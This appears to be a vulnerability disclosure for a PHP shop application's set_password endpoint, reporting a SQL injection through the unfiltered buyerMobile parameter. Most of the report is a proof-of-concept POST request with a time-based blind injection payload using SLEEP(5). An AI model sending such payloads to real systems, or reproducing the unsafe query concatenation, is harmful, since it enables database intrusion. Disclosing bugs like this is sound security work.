There is a sql injection vulnerability #7
Description
Vulnerability Details
url:http://127.0.0.1/index.php/home/set_password,the buyerMobile parameter is the injection point
The vulnerability code is in the set_password function in application/controllers/home.php. When querying the mobile phone number in the database, there is no filtering and direct variable splicing
Use sqlmap to verify that time blind injection does exist
POC:
POST /index.php/home/set_password HTTP/1.1
Host: 127.0.0.1
Content-Length: 150
sec-ch-ua-platform: "Windows"
x-requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
accept: /
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
content-type: application/x-www-form-urlencoded
sec-ch-ua-mobile: ?0
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/index.php/home/set_password
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ACG-SHOP=7trdppv8jsk0pvvmu7slmutgrm; PHPSESSID=8rlf7un6rqqhfjjv0vhjqifd25
Connection: close
buyerId=1&userType=2&buyerMobile=17805931781 AND (SELECT 3501 FROM (SELECT(SLEEP(5)))YLBw)&newPassword=L12345678&buyerName=%E9%9F%A9%E4%BF%8A%E6%9D%B0
It will delay execution for 5 seconds